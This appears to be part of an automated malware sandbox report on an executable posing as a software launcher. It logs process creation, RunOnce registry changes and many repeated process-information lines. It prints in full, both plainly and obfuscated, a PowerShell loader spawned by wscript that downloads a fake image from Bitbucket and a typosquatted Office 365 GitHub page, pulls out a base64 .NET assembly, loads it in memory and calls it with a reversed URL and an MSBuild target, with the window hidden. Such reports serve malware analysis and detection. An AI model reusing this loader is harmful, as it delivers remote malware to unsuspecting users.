g@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior

Source: IMSoftware{Launcher}3.21.exe

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD61D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_00007FF66FD61D28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFC3DC800BD pushad ; iretd		4_2_00007FFC3DC800C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0042B516 pushfd ; retf		14_2_0042B520

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD61684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

0_2_00007FF66FD61684

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
